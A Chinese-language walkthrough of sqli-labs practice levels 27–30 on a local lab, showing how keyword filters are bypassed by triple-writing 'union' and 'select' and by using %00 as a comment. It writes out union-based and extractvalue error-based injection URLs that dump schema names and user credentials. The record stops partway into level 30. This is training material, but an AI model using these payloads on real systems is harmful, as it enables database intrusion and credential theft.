第27题
发现对select和union都进行了顾虑
select双写也进行了过滤
但是三写没有过滤哈哈(颇有种赖皮的感觉)
刚学到一手可以用%00绕过注释符过滤。
?id='uunionnion(sseselectlectelect(1),(database()),(1));%00
http://localhost/sqli-labs-php7-master/Less-27?id='uunionnion(sseselectlectelect(1),group_concat((table_name)),(1)from(information_schema.tables)where(table_schema='security'));%00
id='uunionnion(sseselectlectelect(1),group_concat((column_name)),(1)from(information_schema.columns)where(table_schema='security'%26%26table_name='users'));%00
爆用户名密码
http://localhost/sqli-labs-php7-master/Less-27?id='uunionnion(sseselectlectelect(1),group_concat(username),(1)from(users));%00
第28题
可以看到这道题没有报错信息了,因此不能使用报错注入
判断闭合方式:
发现’时出现异常,因此闭合方式中肯定有‘
判断闭合方式中是否有):
?id=2'&&'1'='1 如果返回的是id=2的值那么为'闭合否则为')闭合。
因此为')闭合。
或者使用%00作为注释试哪个正确
爆库名
爆列名:
id=')union(select(1),group_concat(table_name),(2)from(information_schema.tables)where(table_schema='security'));%00
其余同理。
第29题
判断闭合方式:
为'闭合。
因为是有报错信息的,所以直接使用报错注入
?id=2'||extractvalue(1,concat(0x7e,database()));%00
这。。。不知道是不是我低估了,这真的是29关吗
?id=2'||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))));%00
爆列名
?id=2'||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))));%00
用户名密码
这。。。
第30题
闭合方式判断:“显示错误,'显示正常,因此包含"
闭合方式中没有)
且没有报错回显,因此不能用报错注入